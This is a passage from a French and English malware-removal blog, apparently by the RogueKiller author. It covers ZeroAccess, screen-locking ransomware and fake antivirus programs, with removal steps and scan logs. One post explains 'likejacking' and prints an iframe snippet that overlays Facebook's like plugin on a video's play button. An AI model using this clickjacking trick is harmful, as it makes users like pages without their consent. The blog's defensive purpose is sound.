A classic way to do this without APIMonitor would be to search every call to RegQueryValue (A+W), place breakpoints on them, debug, then watch the parameters, and so on. Here, there's a whole lot of such calls... So it take a long time before breaking into the good place.

Also, I could be wrong with the registry, it could also be a file check. With APIMonitor, everything is in front of us, well filtered and displayed.

I would like to thanks Rohitab for their great work.

APIMonitor is free. So is OllyDBG.

[Rootkit] ZeroAccess (Max++)

2012-06-26T11:20:00.000-07:00

Comment supprimer ZeroAccess (Max++)

How to get rid of ZeroAccess (Max++)

MAJ du 26/06/2012:

ZeroAccess dans sa dernière variante n'est plus un rootkit.

Il se contente d'injecter un processus Windows (services.exe) avec une dll stockée à plusieurs endroits. Voici une vidéo montrant comment s'en débarrasser:

06/26/2012 update:

ZeroAccess in its latest variant is no longer a rootkit.

It only injects a Windows process (services.exe) with a dll stored in several locations.

Here's a video demonstrating how to get rid of it:

Voici les rapports obtenus avec RogueKiller et Malwarebytes:
Here's the reports obtained with both RogueKiller and Malwarebytes:

Télécharger / Download : Malwarebytes RogueKiller

¤¤¤ Entrees de registre: 2 ¤¤¤
[ZeroAccess] HKCR\[...]\InprocServer32 : (\\.\globalroot\systemroot\Installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\n.) -> REPLACED (c:\windows\system32\wbem\wbemess.dll)
[HJ] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -> REPLACED (0)

¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤
[ZeroAccess][FILE] n : c:\windows\installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\n --> REMOVED
[ZeroAccess][FILE] @ : c:\windows\installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\@ --> REMOVED AT REBOOT
[Del.Parent][FILE] 00000001.@ : c:\windows\installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\U\00000001.@ --> REMOVED
[Del.Parent][FILE] 80000000.@ : c:\windows\installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\U\80000000.@ --> REMOVED
[Del.Parent][FILE] 800000cb.@ : c:\windows\installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\U\800000cb.@ --> REMOVED
[ZeroAccess][FOLDER] U : c:\windows\installer\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\U --> REMOVED
[ZeroAccess][FILE] n : c:\documents and settings\tigzy\local settings\application data\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\n --> REMOVED
[ZeroAccess][FILE] @ : c:\documents and settings\tigzy\local settings\application data\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\@ --> REMOVED

¤¤¤ Driver: [CHARGE] ¤¤¤
SSDT[98] : NtLoadKey @ 0x8061C482 -> HOOKED (Unknown @ 0xF8CD30E2)
SSDT[122] : NtOpenProcess @ 0x805C1296 -> HOOKED (Unknown @ 0xF8CD30B0)
SSDT[128] : NtOpenThread @ 0x805C1522 -> HOOKED (Unknown @ 0xF8CD30B5)
SSDT[193] : NtReplaceKey @ 0x8061C332 -> HOOKED (Unknown @ 0xF8CD30EC)
SSDT[204] : NtRestoreKey @ 0x8061BC3E -> HOOKED (Unknown @ 0xF8CD30E7)

¤¤¤ Infection : ZeroAccess ¤¤¤

[...]

Type d'examen: Examen complet
Options d'examen activées: Mémoire | Démarrage | Registre | Système de fichiers | Heuristique/Extra | Heuristique/Shuriken | PUP | PUM
Options d'examen désactivées: P2P
Elément(s) analysé(s): 189868
Temps écoulé: 7 minute(s), 1 seconde(s)

Processus mémoire détecté(s): 0
(Aucun élément nuisible détecté)

Module(s) mémoire détecté(s): 0
(Aucun élément nuisible détecté)

Clé(s) du Registre détectée(s): 1
HKCU\SOFTWARE\CLASSES\CLSID\{42AEDC87-2188-41FD-B9A3-0C966FEABEC1}\INPROCSERVER32 (Trojan.Zaccess) -> Mis en quarantaine et supprimé avec succès.

Valeur(s) du Registre détectée(s): 1
HKCU\SOFTWARE\CLASSES\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32| (Trojan.Zaccess) -> Données: C:\Documents and Settings\tigzy\Local Settings\Application Data\{848ec4ef-b4fb-6501-ab69-678738a3a5c6}\n. -> Mis en quarantaine et supprimé avec succès.

Elément(s) de données du Registre détecté(s): 0
(Aucun élément nuisible détecté)

Dossier(s) détecté(s): 0
(Aucun élément nuisible détecté)

Fichier(s) détecté(s): 5
C:\Documents and Settings\tigzy\Bureau\LogicielsDesinfection\HideProc(v1.0)\HideProcDrv.sys (Rootkit.Agent) -> Aucune action effectuée.
C:\Documents and Settings\tigzy\Bureau\RK_Quarantine\00000001.@.vir (Trojan.Small) -> Mis en quarantaine et supprimé avec succès.
C:\Documents and Settings\tigzy\Bureau\RK_Quarantine\80000000.@.vir (Trojan.Sirefef) -> Mis en quarantaine et supprimé avec succès.
C:\Documents and Settings\tigzy\Bureau\RK_Quarantine\800000cb.@.vir (Rootkit.0Access) -> Mis en quarantaine et supprimé avec succès.
C:\Documents and Settings\tigzy\Bureau\RK_Quarantine\n.vir (Trojan.Dropper.PE4) -> Mis en quarantaine et supprimé avec succès.

(fin)

____________________________________

Variante précédente - Previous variant

Ce rootkit parvient à désactiver l'antivirus, et à s'installer dans la couche tcp/ip, provoquant des redirections de la navigation. Il tue et modifie également les ACLs des programmes qui tentent de le scanner. Ce rootkit se compose de 3 parties:

Une dll (conserv.dll) pour les systèmes x64
Un système de fichiers verrouillé (C:/Windows/$NtUninstallKBxxxxx$) ou il stocke ses fichiers, ainsi il est sûr qu'il ne seront pas supprimés
Un driver patché (x86), choisi de manière pseudo aléatoire. Ce driver est à la base légitime.

(English) This rootkit removes AVs protections, et installs itself inside the tcp/ip stack, which leads to web redirections. It kills and modify ACLs on every programms trying to scan its files. It's composed of 3 parts:

A dll (consrv.dll) for x64 systems
A locked filesystem (C:/Windows/$NtUninstallKBxxxxx$) where it keeps its files,being sure they won't be removed.
A patched driver (x86), randomly chosen. This driver is legit at the origin.

Télécharger et lancer TDSSKiller. Bien selectionner "cure" et "delete" sur tous les objets. -- Donwload and launch TDSSKiller. Be careful to choose "cure" and "delete" on every object.

Vous devriez avoir le rapport suivant -- You should obtain the following report

19:35:47.0004 1156   ============================================================
19:35:47.0309 1156   Initialize success
19:35:55.0922 1516   ============================================================
19:35:55.0922 1516   Scan started
19:35:55.0922 1516   Mode: Manual; SigCheck; TDLFS;
19:35:55.0922 1516   ============================================================
19:35:56.0019 1516   a04dba87        (8f2bb1827cac01aee6a16e30a1260199) C:\WINDOWS\2277133728:1605518712.exe
19:35:56.0046 1516   Suspicious file (Hidden): C:\WINDOWS\2277133728:1605518712.exe. md5: 8f2bb1827cac01aee6a16e30a1260199
19:35:56.0046 1516   a04dba87 ( HiddenFile.Multi.Generic ) - warning
19:35:56.0046 1516   a04dba87 - detected HiddenFile.Multi.Generic (1)
...19:36:21.0921 1516   ============================================================
19:36:21.0921 1516   Scan finished
19:36:21.0921 1516   ============================================================
19:36:22.0020 1420   Detected object count: 3
19:36:22.0020 1420   Actual detected object count: 3
19:37:04.0646 1420   HKLM\SYSTEM\ControlSet001\services\a04dba87 - will be deleted on reboot
19:37:04.0656 1420   C:\WINDOWS\2277133728:1605518712.exe - will be deleted on reboot
19:37:04.0656 1420   a04dba87 ( HiddenFile.Multi.Generic ) - User select action: Delete
19:37:04.0656 1420   procguard ( UnsignedFile.Multi.Generic ) - skipped by user
19:37:04.0656 1420   procguard ( UnsignedFile.Multi.Generic ) - User select action: Skip
19:37:04.0712 1420   Backup copy found, using it..
19:37:04.0740 1420   C:\WINDOWS\system32\DRIVERS\tmtdi.sys - will be cured on reboot
19:37:04.0740 1420   tmtdi ( Rootkit.Win32.ZAccess.g ) - User select action: Cure
19:37:07.0963 1084   Deinitialize success

Ensuite passer un scan avec Combofix. Cela peut être long -- Then run Combofix. It could take a long time.
Vous devriez avoir le rapport suivant -- You should obtain the following report

(((((((((((((((((((((((((((((((((((( Autres suppressions ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\windows\$NtUninstallKB58677$
c:\windows\$NtUninstallKB58677$\2689448583\@
c:\windows\$NtUninstallKB58677$\2689448583\L\echiudpr
c:\windows\$NtUninstallKB58677$\2689448583\U\@00000001
c:\windows\$NtUninstallKB58677$\2689448583\U\@000000c0
c:\windows\$NtUninstallKB58677$\2689448583\U\@000000cb
c:\windows\$NtUninstallKB58677$\2689448583\U\@000000cf
c:\windows\$NtUninstallKB58677$\2689448583\U\@80000000
c:\windows\$NtUninstallKB58677$\2689448583\U\@800000c0
c:\windows\$NtUninstallKB58677$\2689448583\U\@800000cb
c:\windows\$NtUninstallKB58677$\2689448583\U\@800000cf
c:\windows\$NtUninstallKB58677$\339281305
c:\windows\{2521BB91-29B1-4d7e-9137-AC9875D77735}

Le rootkit devrait être supprimé -- The rootkit must have been deleted

[Info] Facebook : Détournement de likes

2012-06-07T09:45:00.006-07:00

Facebook:
Détournement de "Likes"
(Likes-Hijack)

Un petit billet rapide après avoir vu que beaucoup de mes contacts FB se retrouvaient à aimer tous les mêmes vidéos sans intérêts, et surtout provenant de sites "non officiels", à savoir pas sur Youtube, Dailymotion ou autre.

La technique est ultra simple : En arrière plan, la vidéo (player embarqué basique), avec le fameux bouton "Play". Au premier plan, on rajoute un div contenant l'iframe "Like" de Facebook:

Le carré bleu représente la zone de clic de l'iframe. On remarque que le bouton play est compris dedans. Ainsi, lorsqu'on clique sur ce dernier, on déclenche l'iframe qui va "liker" la page sur votre mur sans votre consentement:

src="http://www.facebook.com/plugins/like.confirm.php?href=http://www.fuckinghijackerwebsite.net/somepage.html&layout=button_count&show_faces=false&width=30&action=like&colorscheme=light"

La prochaine fois que vous voyez ce genre de vidéos virales sur votre mur, faites attention aux titres aguicheurs ;)

[Info] 01net : Comment monétiser sur le dos des développeurs.

2012-06-04T11:01:00.004-07:00

01NET

Comment monétiser

sur le dos des développeurs.

Un petit billet "coup de gueule" pour dénoncer ce que j’appelle du grand n'importe quoi.
Aujourd'hui on me rapporte un problème avec RogueKiller sur le site de 01net.

Jusqu'à présent, ces derniers avaient toujours mis le lien direct vers le binaire du site officiel. Bien que cela me dérange de ne pas passer par la page en elle-même, j'avais toléré.

Aujourd'hui, je découvre en lieu et place du lien direct un lien vers un downloader qui va proposer tout un tas de grosses merdouilles (j'ai l'habitude), mais tenez vous bien, en prime de la publicité vidéo!

Et pas qu'un peu! Avec un semblant de barre de téléchargement (le binaire officiel fait 1Mo et quelques...) qui est rapide au début, arrivé vers les 99% la barre se stoppe net de façon à permettre de monétiser à balle le téléchargement (une vidéo vue pendant 3 secondes est moins rentable qu'une visionnée 30 secondes...)

Là où c'est vicieux, c'est que le fait de bloquer à 99% va faire croire à l'utilisateur que c'est bientôt fini! Que nenni, c'est le programme qui décide quand c'est fini.

Petite analyse à chaud:

Jusque là tout va bien

Allez, ça commence: Toolbar Babylon

De la pub maintenant... On vous fait croire que ça mets des plombes à télécharger

Le must. De la pub vidéo en streaming!

On fait croire que ça télécharge toujours...

Le download se stoppe à 99% histoire de vous laisser voir la vidéo.

___________________________________

Petit commentaire de ma part :
RogueKiller n'a jamais été téléchargé, le download n'a jamais repris après.
Je sais pas si leur truc est buggé...

Conclusion : On ne le répétera jamais assez.

Prenez vos logiciels sur les liens des développeurs!

Le seul lien officiel francophone de RogueKiller est ici:

http://www.sur-la-toile.com/RogueKiller/

[RansomWare] Gendarmerie Nationale

2012-05-24T09:03:00.000-07:00

Comment supprimer le ransomware
"Gendarmerie Nationale"

Ce Ransomware / Screenlocker prend tout l'écran, empêchant tout action de l'utilisateur.

Il peut être présent sous plusieurs variantes:

Ajout d'une clé RUN lui permettant de se relancer au démarrage du PC
Remplacement du fichier %windir% / explorer.exe avec copie préalable dans %windir% / twexx32.dll
Ajout d'un raccourci dans le dossier de démarrage

En fonction de ces variantes, plusieurs méthodes existent. Pour savoir quelle variante est présente (et la supprimer), suivre la démarche suivante:

Télécharger : Malwarebytes RogueKiller

****** Variante utilisant une clé RUN ou ajoutant un raccourci ******

Démarrer en mode sans échec avec prise en charge réseau. Si le malware est présent, ce n'est pas cette variante : passer à la suite

Télécharger et lancer RogueKiller en mode Scan puis Suppression

Vous devriez avoir le rapport suivant et être capable de redémarrer normalement:

RogueKiller V6.2.0 [12/12/2011] par Tigzy
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html
Blog: http://tigzyrk.blogspot.com

Systeme d'exploitation: Windows Vista (6.0.6002 Service Pack 2) 32 bits version
Demarrage : Mode normal
Utilisateur: **** [Droits d'admin]
Mode: Recherche -- Date : 17/12/2011 11:27:31

¤¤¤ Processus malicieux: 0 ¤¤¤

¤¤¤ Entrees de registre: 7 ¤¤¤
[SUSP PATH] HKCU\[...]\Run : w25zxz84.exe (C:\Users\dary\AppData\Roaming\w25zxz84.exe) -> DELETE
[SUSP PATH] HKUS\S-1-5-21-2280558674-1678247186-3373966309-1000[...]\Run : w25zxz84.exe (C:\Users\dary\AppData\Roaming\w25zxz84.exe) -> DELETE
[SUSP PATH] ctfmon.lnk @Lauro : C:\WINDOWS\system32\rundll32.exe|C:\DOCUME~1\ALLUSE~1\APPLIC~1\4454F1A831D76E378B738CBDF0422CE.exe.tmp -> DELETED
[HJ] HKLM\[...]\NewStartPanel : {59031a47-3f72-44a7-89c5-5595fe6b30ee} (1) -> DELETE
[HJ] HKCU\[...]\ClassicStartMenu : {59031a47-3f72-44a7-89c5-5595fe6b30ee} (1) -> DELETE
[HJ] HKLM\[...]\NewStartPanel : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -> DELETE
[HJ] HKCU\[...]\ClassicStartMenu : {20D04FE0-3AEA-1069-A2D8-08002B30309D} (1) -> DELETE
[HJ] HKCU\[...]\ClassicStartMenu : {645FF040-5081-101B-9F08-00AA002F954E} (1) -> DELETE

¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤

Lancer un scan avec Malwarebytes et tout supprimer

****** Variante modifiant la clé SHELL ******

EDIT du 24/05/2012:

Parfois le mode sans échec peut être inaccessible. Si c'est le cas, alors nous sommes dans le cas d'une modification de la clé Shell. Il va falloir graver un live CD.

RogueKiller peut maintenant désinfecter les systèmes depuis un live CD OTLPE.
Suivre la vidéo pour s'en débarrasser:

Télécharger en plus OTLPE et suivre les explications de la vidéo.

****** Variante remplaçant explorer.exe ******

Si vous pensez être en présence de cette variante (méthodes précédentes n'ayant pas fonctionné), suivre la vidéo suivante pour le supprimer (remplacement de explorer.exe).
Remarque : La méthode de la vidéo peut ne pas marcher. Si c'est le cas, voir en dessous.

Le raccourci clavier CTRL + ALT + PAUSE peut également marcher pour débloquer le bureau

La méthode de la vidéo ne marche pas tout le temps (en particulier avec des version récentes de IE). Si c'est le cas, il faut alors graver et démarrer sur un live CD (comme Ubuntu : http://ubuntu-fr.org/telechargement , ou encore OTLPE). Puis :

Une fois sur le live CD, aller dans le disque local appartenant à windows
Trouver le fichier C:/windows/twexx32.dll (S'il n'existe pas, ne pas faire ce qui suit!)
Supprimer C:/windows/explorer.exe
Renommer twexx32.dll en explorer.exe
Redémarrer en mode normal, le problème doit être résolu

On peut également utiliser une autre méthode pour réaliser la même chose sans graver de live CD

Démarrer en mode sans échec invite de commande
Taper la commande suivante (si votre disque système est C:) et redémarrer:

copy /Y /B C:\windows\twexx32.dll /B C:\windows\explorer.exe

[Rogue] Security Shield

2012-03-23T03:45:00.002-07:00

Comment supprimer Security Shield

How to get rid of Security Shield

Mise à jour du 23/03/2012:

Ce Rogue à lancé une nouvelle campagne ces derniers jours, employant exactement le même fonctionnel, le même nom et la même interface.

2011/11/23 Update:

This rogue comes back these days with the same functionnal, name and GUI.

_______________________________________

Télécharger et lancer RogueKiller en mode "Scan" -- Download and start RogueKiller with mode Scan
S'il ne peut pas se lancer, renommez le en "winlogon.exe" ou "RogueKiller.com" -- Il you are unable to lauch it, rename it as "winlogon.exe" or "RogueKiller.com"

Vous devriez avoir le rapport suivant -- You should obtain the following report

RogueKiller V7.3.2 [20/03/2012] par Tigzy
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html
Blog: http://tigzyrk.blogspot.com

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur: Administrateur [Droits d'admin]
Mode: Recherche -- Date: 23/03/2012 11:30:54

¤¤¤ Processus malicieux: 2 ¤¤¤
[WINDOW : Security Shield] syecx.exe -- C:\Documents and Settings\Administrateur\Local Settings\Application Data\syecx.exe -> KILLED [TermProc]
[SUSP PATH] syecx.exe -- C:\DOCUME~1\ADMINI~1\LOCALS~1\APPLIC~1\syecx.exe -> KILLED [TermProc]

¤¤¤ Entrees de registre: 0 ¤¤¤

¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤

¤¤¤ Driver: [CHARGE] ¤¤¤

¤¤¤ Infection : Rogue.AntiSpy-ST ¤¤¤

¤¤¤ Fichier HOSTS: ¤¤¤
127.0.0.1 localhost
::1 localhost

¤¤¤ MBR Verif: ¤¤¤

+++++ PhysicalDrive0: VBOX HARDDISK +++++
--- User ---
[MBR] c708b764ca9daa4f8f33e4e8b3b517da
[BSP] f4eb87199eee8a432bb482bb55118447 : Windows XP MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x07) [VISIBLE] Offset (sectors): 63 | Size: 4086 Mo
User = LL1 ... OK!
User = LL2 ... OK!

Termine : << RKreport[1].txt >>
RKreport[1].txt

Ensuite passer un scan avec Malwarebytes -- Then do a scan with Malwarebytes

Le rogue devrait être supprimé -- The rogue must have been deleted

[Rogue] System Check / System restore

2012-03-23T02:17:00.000-07:00

Comment supprimer System Check / System Restore

How to get rid of System Check / System Restore

Mise à jour du 23/03/2012:

Ce Rogue à lancé une nouvelle campagne ces derniers jours.
Ayant mis à jour RogueKiller (interface graphique), il est important de lire cette note:
* En lieu et place des modes 1 et 2, il y a maintenant des boutons "Scan" et "Suppression".
* A la place du mode 6, il faut utiliser le bouton "Raccourci RAZ"
* Il est très important de ne PAS utiliser de nettoyeurs comme CCleaner avec cette infection, au risque de perdre les données stockées par le rogue dans les dossiers temporaires (il s'agit des raccourcis du bureau, du menu démarrer et de la barre de lancement rapide). Dans le cas contraire, le mode "Raccourci RAZ" de RogueKiller ne pourra pas les restaurer.

2012/03/23 Update:

This rogue comes back these days. Due to the update of RogueKiller (GUI), it's important to read carefully this note:
* Instead of the modes 1 and 2, there's now the "Scan" and "Delete" buttons
* Instead of the mode 6, there's now the "Shortcut Fix" button.
* It's very important NOT to use cleaners like CCleaner with this malware, otherwise you could lose all datas stored in the temp folders by the malware (shortcuts from the start menu, desktop and quick launch). In this case, the "Shortcut Fix" mode of RogueKiller will not be able to restore them.

_______________________________________

Mise à jour du 23/11/2011:

Ce Rogue à lancé une nouvelle campagne ces derniers jours, employant exactement le même fonctionnel, un nom différent et presque la même interface. (System Fix)

2011/11/23 Update:

This rogue comes back these days with the same functionnal, different name and nearly the same GUI. (System Fix)

_______________________________________

Télécharger et lancer RogueKiller en mode 2 (Suppression) -- Download and start RogueKiller with mode 2 (Delete)
S'il ne peut pas se lancer, renommez le en "winlogon.exe" -- Il you are unable to lauch it, rename it as "winlogon.exe"

Vous devriez avoir le rapport suivant -- You should obtain the following report

RogueKiller V6.1.7 [03/11/2011] par Tigzy
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html
Blog: http://tigzyrk.blogspot.com

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur: tigzy [Droits d'admin]
Mode: Suppression -- Date : 05/11/2011 09:54:15

¤¤¤ Processus malicieux: 3 ¤¤¤
[SUSP PATH] SIyHoyHlXaPT.exe -- C:\Documents and Settings\All Users\Application Data\SIyHoyHlXaPT.exe -> KILLED [TermProc]
[SUSP PATH] 6DSS92c31Apgjk.exe -- C:\Documents and Settings\All Users\Application Data\6DSS92c31Apgjk.exe -> KILLED [TermProc]
[SUSP PATH] P1kAlMiG2Kb7Fz.exe -- C:\DOCUME~1\tigzy\LOCALS~1\Temp\P1kAlMiG2Kb7Fz.exe -> KILLED [TermProc]

¤¤¤ Entrees de registre: 5 ¤¤¤
[SUSP PATH] HKLM\[...]\Run : SIyHoyHlXaPT.exe (C:\Documents and Settings\All Users\Application Data\SIyHoyHlXaPT.exe) -> DELETED
[HJPOL] HKCU\[...]\System : DisableTaskMgr (1) -> DELETED
[HJPOL] HKLM\[...]\System : DisableTaskMgr (1) -> DELETED
[HJPOL] HKCU\[...]\Explorer : NoDesktop (1) -> DELETED
[WallPP] HKCU\[...]\Desktop : Wallpaper () -> REPLACED (C:\WINDOWS\web\wallpaper\Colline verdoyante.bmp)

¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤

¤¤¤ Driver: [LOADED] ¤¤¤

¤¤¤ Infection : ¤¤¤

¤¤¤ Fichier HOSTS: ¤¤¤
127.0.0.1 localhost

Termine : << RKreport[1].txt >>
RKreport[1].txt

Relancer RogueKiller avec le mode 6 pour rétablir les attributs des fichiers masqués par le rogue. Vous devriez avoir le rapport suivant -- Start RogueKiller again with mode 6 to reset attributes on files hidden by the rogue. You should obtain the following report

RogueKiller V6.1.7 [03/11/2011] par Tigzy
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html
Blog: http://tigzyrk.blogspot.com

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur: tigzy [Droits d'admin]
Mode: Raccourcis RAZ -- Date : 05/11/2011 09:55:05

¤¤¤ Processus malicieux: 0 ¤¤¤

¤¤¤ Driver: [LOADED] ¤¤¤

Attributs de fichiers restaures:
Bureau: Success 798 / Fail 0
Lancement rapide: Success 4 / Fail 0
Programmes: Success 2409 / Fail 0
Menu demarrer: Success 139 / Fail 0
Dossier utilisateur: Success 305 / Fail 0
Mes documents: Success 48 / Fail 0
Mes favoris: Success 11 / Fail 0
Mes images: Success 0 / Fail 0
Ma musique: Success 0 / Fail 0
Mes videos: Success 0 / Fail 0
Disques locaux: Success 10477 / Fail 0
Sauvegarde: [FOUND] Success 96 / Fail 1

Lecteurs:
[C:] \Device\HarddiskVolume1 -- 0x3 --> Restored
[D:] \Device\CdRom0 -- 0x5 --> Skipped

             ¤¤¤ Infection : Fake HDD ¤¤¤

             Termine : << RKreport[2].txt >>
             RKreport[1].txt ; RKreport[2].txt

Ensuite passer un scan avec Malwarebytes -- Then do a scan with Malwarebytes

Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org

Version de la base de données: 8089

Windows 5.1.2600 Service Pack 3
Internet Explorer 6.0.2900.5512

05/11/2011 10:15:14
mbam-log-2011-11-05 (10-15-13).txt

Type d'examen: Examen complet (C:\|)
Elément(s) analysé(s): 169251
Temps écoulé: 9 minute(s), 40 seconde(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 7
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 9

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_ShowControlPanel (PUM.Hijack.StartMenu) -> Bad: (0) Good: (1) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_ShowHelp (PUM.Hijack.StartMenu) -> Bad: (0) Good: (1) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_ShowMyComputer (PUM.Hijack.StartMenu) -> Bad: (0) Good: (1) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_ShowMyDocs (PUM.Hijack.StartMenu) -> Bad: (0) Good: (1) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_ShowRun (PUM.Hijack.StartMenu) -> Bad: (0) Good: (1) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_ShowSearch (PUM.Hijack.StartMenu) -> Bad: (0) Good: (1) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp (PUM.Hijack.Help) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
c:\documents and settings\all users\application data\6dss92c31apgjk.exe (Trojan.FakeAlert) -> Quarantined and deleted successfully.
c:\documents and settings\all users\application data\fgniibr2lcq8x8l.exe (Trojan.FakeAlert) -> Quarantined and deleted successfully.
c:\documents and settings\all users\application data\siyhoyhlxapt.exe (Trojan.FakeAlert) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\rk_quarantine\6dss92c31apgjk.exe.vir (Trojan.FakeAlert) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\Bureau\rk_quarantine\siyhoyhlxapt.exe.vir (Trojan.FakeAlert) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\local settings\Temp\p5tm1qbi6dss92.exe.tmp (Trojan.FakeAlert) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\local settings\temporary internet files\Content.IE5\ZDRB2Q2A\fakehdd[2].vir (Trojan.FakeAlert) -> Quarantined and deleted successfully.
c:\documents and settings\tigzy\local settings\temporary internet files\Content.IE5\ZDRB2Q2A\systemrestore[1].vir (Trojan.FakeAlert) -> Quarantined and deleted successfully.
c:\RECYCLER\s-1-5-21-1123561945-1202660629-682003330-1003\Dc6\fgniibr2lcq8x8l.exe.vir (Trojan.FakeAlert) -> Quarantined and deleted successfully.

Le rogue devrait être supprimé -- The rogue must have been deleted

[RansomWare] GEMA - L'accès à votre ordinateur a été fermé

2012-02-07T10:04:00.000-08:00

Comment supprimer le ransomware
"GEMA" (Gendarmerie 2)

Image: Malekal.com

Ce Ransomware / Screenlocker prend tout l'écran, empêchant tout action de l'utilisateur.
Pour s'en débarrasser, vous pouvez vous aider de la vidéo. Les instructions analogues se trouvent sinon plus bas.

Pour récupérer l'accès au bureau, faire le raccourci clavier suivant :

CTRL+ALT+PAUSE (le bouton pause se trouve en haut à droite)

Télécharger et lancer RogueKiller
Attendre la fin du Prescan. Cliquer sur "Scan", et attendre la fin du scan
Décocher les éventuels faux positifs. Laisser coché ce qui concerne InetAccelerator.exe, il s'agit du malware.
Cliquer sur "Suppression". (Puis sur Rapport pour voir ce dernier)

Vous devriez avoir le rapport suivant:

RogueKiller V7.0.2 [30/01/2012] par Tigzy
mail: tigzyRK<at>gmail<dot>com
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html
Blog: http://tigzyrk.blogspot.com

Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version
Demarrage : Mode normal
Utilisateur: Administrateur [Droits d'admin]
Mode: Suppression -- Date : 02/02/2012 16:06:38

¤¤¤ Processus malicieux: 0 ¤¤¤

¤¤¤ Entrees de registre: 5 ¤¤¤
[BLACKLIST Value] HKCU\[...]\Run : InetAccelerator (C:\Documents and Settings\Administrateur\Application Data\InetAccelerator\InetAccelerator.exe) -> DELETED
[BLACKLIST Value] HKLM\[...]\Run : InetAccelerator (C:\WINDOWS\system32\InetAccelerator.exe) -> DELETED
[SUSP PATH] HKLM\[...]\Run : InetAccelerator. (C:\Documents and Settings\All Users\Application Data\InetAccelerator\InetAccelerator.exe) -> DELETED
[SUSP PATH] HKCU\[...]\Winlogon : shell (C:\Documents and Settings\Administrateur\Application Data\InetAccelerator\InetAccelerator.exe,Explorer.exe,) -> DELETED
[SUSP PATH] HKLM\[...]\Winlogon : Userinit (C:\Documents and Settings\All Users\Application Data\InetAccelerator\InetAccelerator.exe,C:\WINDOWS\system32\InetAccelerator.exe,C:\WINDOWS\system32\userinit.exe,) -> REPLACED (C:\WINDOWS\system32\userinit.exe,)

¤¤¤ Fichiers / Dossiers particuliers: ¤¤¤
...

Ensuite passer un scan avec Malwarebytes

Le malware devrait être supprimé

[Rogue] XP Security 2012

2011-12-05T23:10:00.000-08:00

Comment supprimer XP Security 2012

How to get rid of XP Security 2012

_______________________________________

Mise à jour du 04/01/2012:

Ce Rogue vient maintenant assez souvent avec un rootkit ZeroAcces, non traité par RogueKiller / Malwarebyte. Si le rapport RogueKiller montre un signe d'infection nommé "ZeroAccess", à la suite de ce billet se rendre sur la page suivante et effectuer les manips nécessaires : http://tigzyrk.blogspot.com/2011/09/rootkit-zeroaccess-max.html

2011/12/05 Update:

This rogue comes often now with some ZeroAccess rootkit, not handled by RogueKiller / Malwarebytes. If the RogueKiller report shows a "ZeroAccess" infection, please follow the next link when you finished this one : http://tigzyrk.blogspot.com/2011/09/rootkit-zeroaccess-max.html

Mise à jour du 05/12/2011:

Ce Rogue à lancé une nouvelle campagne ces derniers jours, employant exactement le même fonctionnel, les mêmes noms et presque la même interface.

2011/12/05 Update:

